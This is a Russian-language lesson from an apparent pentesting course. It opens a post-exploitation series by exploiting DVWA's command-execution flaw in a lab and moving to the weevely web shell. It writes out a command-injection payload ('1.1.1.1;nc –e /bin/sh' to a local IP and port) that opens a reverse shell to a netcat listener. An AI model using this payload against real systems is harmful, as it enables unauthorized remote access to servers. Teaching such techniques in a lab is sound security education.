Пост-эксплуатация

#1 После атаки. Пост-эксплуатация.

Здравствуйте, дорогие друзья.

Остановимся на обратном шелле и в последующих уроках мы будем работать с обратным шеллом weevely, и я покажу Вам, что можно делать, получив доступ к целевому веб-серверу.

И начнем мы с обратного шелла, поскольку он не дает нам столько возможностей, сколько дает weevely. На самом деле можно перейти из обратного шелла в weevely. Для начала давайте прослушаем порт 8888, и я буду ждать обратное подключение:

Мне нужно узнать мой ip-адрес. Это делается с помощью команды «ifconfig»:

Перехожу в DVWA, и воспользуюсь уязвимостью запуска кода. Тем самым, мы запустим обратный шелл. Далее рассмотрим, как с ним работать. Устанавливаем уровень безопасности на низкий «low».

Мы уже делали такие манипуляции в command execution, но повторим. Введем следующую запись: «1.1.1.1;nc –e /bin/sh 192.168.15.128 8888»:

Этот код мы уже использовали с другими уязвимостями, и получали идентичные результаты после ввода.

Переходим в терминал, и видим полноценный shell bash:

Мы можем использовать самые разные команды. Сначала, я научу Вас, что делать после того, как Вы получили такой доступ. В частности, будем рассматривать инструмент «weevley».